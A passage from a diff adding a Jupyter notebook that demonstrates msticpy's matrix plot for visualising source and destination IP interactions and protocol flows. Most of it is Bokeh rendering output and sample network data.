(Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"3022\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"54e127b6-3f66-4976-965f-e7c8f33696d8\" data-root-id=\"3024\"></div>\n"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/vnd.bokehjs_exec.v0+json": "",
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"6b8c0e0a-efc0-4209-9c65-a64b0970f987\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"3035\"}],\"center\":[{\"id\":\"3037\"},{\"id\":\"3040\"}],\"height\":700,\"left\":[{\"id\":\"3038\"}],\"outline_line_color\":null,\"renderers\":[{\"id\":\"3058\"}],\"title\":{\"id\":\"3025\"},\"toolbar\":{\"id\":\"3047\"},\"toolbar_location\":\"above\",\"width\":900,\"x_range\":{\"id\":\"3027\"},\"x_scale\":{\"id\":\"3031\"},\"y_range\":{\"id\":\"3029\"},\"y_scale\":{\"id\":\"3033\"}},\"id\":\"3024\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"3044\",\"type\":\"ResetTool\"},{\"attributes\":{\"data\":{\"DestinationIP\":[\"40.77.228.69\",\"52.168.138.145\",\"13.71.172.130\",\"40.91.75.5\",\"40.124.45.19\",\"13.71.172.128\",\"172.217.15.99\",\"20.38.98.100\",\"104.43.212.12\",\"13.71.172.128\",\"13.71.172.130\",\"40.124.45.19\",\"65.55.44.109\",\"65.55.44.109\",\"13.65.107.32\",\"40.124.45.19\",\"40.77.228.69\",\"52.165.170.112\",\"52.168.138.145\",\"72.21.81.200\",\"13.65.107.32\",\"40.124.45.19\",\"52.168.138.145\",\"65.55.44.109\",\"52.168.138.145\",\"40.124.45.19\",\"72.21.91.29\",\"72.21.81.200\",\"40.91.75.5\",\"13.71.172.130\",\"65.55.44.108\",\"65.55.44.109\",\"72.21.81.240\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"13.71.172.128\",\"40.77.232.95\",\"52.165.170.112\",\"65.55.44.109\",\"72.21.81.200\",\"72.21.91.29\",\"52.168.138.145\",\"13.67.143.117\",\"13.68.93.109\",\"13.71.172.128\",\"23.48.36.78\",\"52.165.170.112\",\"65.55.44.109\",\"20.38.98.100\",\"8.249.241.254\",\"40.77.228.69\",\"172.217.15.99\",\"13.67.143.117\",\"13.71.172.130\",\"40.124.45.19\",\"40.77.226.250\",\"52.239.152.10\",\"65.55.44.109\",\"90.130.70.73\",\"20.38.98.100\",\"65.55.44.109\",\"13.65.107.32\",\"13.67.143.117\",\"20.38.98.100\",\"13.67.143.117\",\"13.71.172.128\",\"13.71.172.130\",\"13.83.148.218\",\"20.38.98.100\",\"23.4.187.27\",\"40.124.45.19\",\"65.55.44.108\",\"72.21.81.200\",\"72.21.91.29\",\"99.84.104.63\",\"13.65.107.32\",\"40.124.45.19\",\"172.217.15.99\",\"8.249.241.254\",\"13.68.93.109\",\"40.77.228.69\",\"65.55.44.109\",\"52.168.138.145\",\"40.124.45.19\",\"157.55.134.136\"],\"SourceIP\":[\"10.0.3.5\",\"10.0.3.5\",\"104.43.212.12\",\"104.43.212.12\",\"13.107.4.50\",\"13.65.107.32\",\"13.65.107.32\",\"13.65.107.32\",\"13.67.143.117\",\"13.67.143.117\",\"13.67.143.117\",\"13.67.143.117\",\"13.67.143.117\",\"13.68.93.109\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.128\",\"13.71.172.130\",\"13.71.172.130\",\"13.71.172.130\",\"13.71.172.130\",\"13.83.148.218\",\"131.107.147.209\",\"157.55.134.136\",\"172.217.15.99\",\"172.217.8.14\",\"20.38.98.100\",\"20.38.98.100\",\"20.38.98.100\",\"20.38.98.100\",\"205.185.216.42\",\"23.4.187.27\",\"23.48.36.78\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.124.45.19\",\"40.77.226.250\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.228.69\",\"40.77.232.95\",\"40.77.232.95\",\"40.91.75.5\",\"52.165.170.112\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.168.138.145\",\"52.239.152.10\",\"52.239.152.10\",\"65.55.163.76\",\"65.55.44.108\",\"65.55.44.108\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"65.55.44.109\",\"72.21.81.200\",\"72.21.81.200\",\"72.21.81.240\",\"72.21.81.240\",\"72.21.91.29\",\"72.21.91.29\",\"72.21.91.29\",\"8.249.241.254\",\"90.130.70.73\",\"99.84.104.63\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85],\"plt_size\":{\"__ndarray__\":\"AAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAUQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAABRAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAeQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAABRAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAABRAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAAFEAAAAAAAAAEQAAAAAAAAARAAAAAAAAAFEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAAFEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAUQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAkQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAUQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQAAAAAAAAARAAAAAAAAABEAAAAAAAAAEQA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[86]},\"row_count\":[1,1,1,1,1,1,1,2,1,1,1,2,1,1,1,1,3,1,1,1,1,1,1,2,1,1,1,1,1,2,1,1,1,1,1,1,2,1,1,2,1,1,1,1,1,2,1,1,1,2,1,1,1,1,1,1,1,1,4,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],\"size\":[1,1,1,1,1,1,1,2,1,1,1,2,1,1,1,1,3,1,1,1,1,1,1,2,1,1,1,1,1,2,1,1,1,1,1,1,2,1,1,2,1,1,1,1,1,2,1,1,1,2,1,1,1,1,1,1,1,1,4,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"3067\"},\"selection_policy\":{\"id\":\"3068\"}},\"id\":\"3023\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"3039\",\"type\":\"CategoricalTicker\"},{\"attributes\":{\"text\":\"IP Interaction\",\"text_font_size\":\"15pt\"},\"id\":\"3025\",\"type\":\"Title\"},{\"attributes\":{\"axis_label\":\"SourceIP\",\"axis_line_color\":null,\"formatter\":{\"id\":\"3065\"},\"major_label_orientation\":1.5707963267948966,\"major_label_policy\":{\"id\":\"3064\"},\"major_label_standoff\":0,\"major_label_text_font_size\":\"11pt\",\"major_tick_line_color\":null,\"ticker\":{\"id\":\"3036\"}},\"id\":\"3035\",\"type\":\"CategoricalAxis\"},{\"attributes\":{},\"id\":\"3064\",\"type\":\"AllLabels\"},{\"attributes\":{\"factors\":[\"99.84.104.63\",\"90.130.70.73\",\"8.249.241.254\",\"72.21.91.29\",\"72.21.81.240\",\"72.21.81.200\",\"65.55.44.109\",\"65.55.44.108\",\"52.239.152.10\",\"52.168.138.145\",\"52.165.170.112\",\"40.91.75.5\",\"40.77.232.95\",\"40.77.228.69\",\"40.77.226.250\",\"40.124.45.19\",\"23.48.36.78\",\"23.4.187.27\",\"20.38.98.100\",\"172.217.15.99\",\"157.55.134.136\",\"13.83.148.218\",\"13.71.172.130\",\"13.71.172.128\",\"13.68.93.109\",\"13.67.143.117\",\"13.65.107.32\",\"104.43.212.12\"]},\"id\":\"3029\",\"type\":\"FactorRange\"},{\"attributes\":{},\"id\":\"3062\",\"type\":\"CategoricalTickFormatter\"},{\"attributes\":{\"axis_label\":\"DestinationIP\",\"axis_line_color\":null,\"formatter\":{\"id\":\"3062\"},\"major_label_policy\":{\"id\":\"3061\"},\"major_label_standoff\":0,\"major_label_text_font_size\":\"11pt\",\"major_tick_line_color\":null,\"ticker\":{\"id\":\"3039\"}},\"id\":\"3038\",\"type\":\"CategoricalAxis\"},{\"attributes\":{\"axis\":{\"id\":\"3035\"},\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"3037\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"3033\",\"type\":\"CategoricalScale\"},{\"attributes\":{},\"id\":\"3067\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"3061\",\"type\":\"AllLabels\"},{\"attributes\":{\"data_source\":{\"id\":\"3023\"},\"glyph\":{\"id\":\"3056\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3057\"},\"view\":{\"id\":\"3059\"}},\"id\":\"3058\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"3041\"},{\"id\":\"3042\"},{\"id\":\"3043\"},{\"id\":\"3044\"},{\"id\":\"3045\"},{\"id\":\"3053\"}]},\"id\":\"3047\",\"type\":\"Toolbar\"},{\"attributes\":{\"axis\":{\"id\":\"3038\"},\"dimension\":1,\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"3040\",\"type\":\"Grid\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"value\":\"red\"},\"line_color\":{\"value\":\"#1f77b4\"},\"size\":{\"field\":\"plt_size\"},\"x\":{\"field\":\"SourceIP\"},\"y\":{\"field\":\"DestinationIP\"}},\"id\":\"3056\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"3031\",\"type\":\"CategoricalScale\"},{\"attributes\":{\"source\":{\"id\":\"3023\"}},\"id\":\"3059\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"red\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"size\":{\"field\":\"plt_size\"},\"x\":{\"field\":\"SourceIP\"},\"y\":{\"field\":\"DestinationIP\"}},\"id\":\"3057\",\"type\":\"Circle\"},{\"attributes\":{\"factors\":[\"10.0.3.5\",\"104.43.212.12\",\"13.107.4.50\",\"13.65.107.32\",\"13.67.143.117\",\"13.68.93.109\",\"13.71.172.128\",\"13.71.172.130\",\"13.83.148.218\",\"131.107.147.209\",\"157.55.134.136\",\"172.217.15.99\",\"172.217.8.14\",\"20.38.98.100\",\"205.185.216.42\",\"23.4.187.27\",\"23.48.36.78\",\"40.124.45.19\",\"40.77.226.250\",\"40.77.228.69\",\"40.77.232.95\",\"40.91.75.5\",\"52.165.170.112\",\"52.168.138.145\",\"52.239.152.10\",\"65.55.163.76\",\"65.55.44.108\",\"65.55.44.109\",\"72.21.81.200\",\"72.21.81.240\",\"72.21.91.29\",\"8.249.241.254\",\"90.130.70.73\",\"99.84.104.63\"]},\"id\":\"3027\",\"type\":\"FactorRange\"},{\"attributes\":{},\"id\":\"3068\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"SourceIP\",\"@SourceIP\"],[\"DestinationIP\",\"@DestinationIP\"],[\"value\",\"@size\"]]},\"id\":\"3053\",\"type\":\"HoverTool\"},{\"attributes\":{},\"id\":\"3065\",\"type\":\"CategoricalTickFormatter\"},{\"attributes\":{},\"id\":\"3036\",\"type\":\"CategoricalTicker\"},{\"attributes\":{},\"id\":\"3041\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"3046\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"3045\",\"type\":\"SaveTool\"},{\"attributes\":{\"overlay\":{\"id\":\"3046\"}},\"id\":\"3042\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"3043\",\"type\":\"PanTool\"}],\"root_ids\":[\"3024\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"6b8c0e0a-efc0-4209-9c65-a64b0970f987\",\"root_ids\":[\"3024\"],\"roots\":{\"3024\":\"54e127b6-3f66-4976-965f-e7c8f33696d8\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);"
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "3024"
+      }
+     }
+    },
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "Figure(id='3024', ...)"
+      ],
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.plotting.figure.Figure\">Figure</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'3024', <span id=\"3121\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">above&nbsp;=&nbsp;[],</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_scale&nbsp;=&nbsp;1,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">below&nbsp;=&nbsp;[CategoricalAxis(id='3035', ...)],</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">center&nbsp;=&nbsp;[Grid(id='3037', ...), Grid(id='3040', ...)],</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_x_ranges&nbsp;=&nbsp;{},</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_y_ranges&nbsp;=&nbsp;{},</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_height&nbsp;=&nbsp;None,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_width&nbsp;=&nbsp;None,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;700,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">hidpi&nbsp;=&nbsp;True,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_height&nbsp;=&nbsp;0,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_width&nbsp;=&nbsp;0,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">left&nbsp;=&nbsp;[CategoricalAxis(id='3038', ...)],</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_factor&nbsp;=&nbsp;10,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_interval&nbsp;=&nbsp;300,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_threshold&nbsp;=&nbsp;2000,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_timeout&nbsp;=&nbsp;500,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">match_aspect&nbsp;=&nbsp;False,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border&nbsp;=&nbsp;5,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_bottom&nbsp;=&nbsp;None,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_left&nbsp;=&nbsp;None,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_right&nbsp;=&nbsp;None,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_top&nbsp;=&nbsp;None,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_height&nbsp;=&nbsp;0,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_width&nbsp;=&nbsp;0,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_cap&nbsp;=&nbsp;'butt',</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_color&nbsp;=&nbsp;None,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash&nbsp;=&nbsp;[],</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash_offset&nbsp;=&nbsp;0,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_join&nbsp;=&nbsp;'bevel',</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_width&nbsp;=&nbsp;1,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">output_backend&nbsp;=&nbsp;'canvas',</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">renderers&nbsp;=&nbsp;[GlyphRenderer(id='3058', ...)],</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">reset_policy&nbsp;=&nbsp;'standard',</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">right&nbsp;=&nbsp;[],</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title&nbsp;=&nbsp;Title(id='3025', ...),</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title_location&nbsp;=&nbsp;'above',</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar&nbsp;=&nbsp;Toolbar(id='3047', ...),</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_location&nbsp;=&nbsp;'above',</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_sticky&nbsp;=&nbsp;True,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;900,</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_range&nbsp;=&nbsp;FactorRange(id='3027', ...),</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_scale&nbsp;=&nbsp;CategoricalScale(id='3031', ...),</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_range&nbsp;=&nbsp;FactorRange(id='3029', ...),</div></div><div class=\"3120\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_scale&nbsp;=&nbsp;CategoricalScale(id='3033', ...))</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"3121\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"3120\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 25
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "## You can also import and use the `plot_matrix` function directly\r\n",
+    "\r\n",
+    "Supply the input DataFrame as the first parameter (or as named\r\n",
+    "parameter `data`)\r\n",
+    "\r\n",
+    "```python\r\n",
+    "from msticpy.vis.matrix_plot import plot_matrix\r\n",
+    "\r\n",
+    "plot_matrix(data=net_df, x=\"SourceIP\", y=\"DestinationIP\", title=\"IP Interaction\")\r\n",
+    "```"
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "## Plotting interactions based on column value\r\n",
+    "\r\n",
+    "Instead of a simple count of rows linking an X-Y pair of entities,\r\n",
+    "you can use a numeric column in the input DataFrame to control\r\n",
+    "the size of the plotted circle.\r\n",
+    "\r\n",
+    "In this example, we're using the \"TotalAllowedFlows\" column."
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "source": [
+    "all_df.mp_plot.matrix(\r\n",
+    "    x=\"L7Protocol\",\r\n",
+    "    y=\"AllExtIPs\",\r\n",
+    "    value_col=\"TotalAllowedFlows\",\r\n",
+    "    title=\"External IP protocol flows\",\r\n",
+    "    sort=\"asc\",\r\n",
+    ")"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1911\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
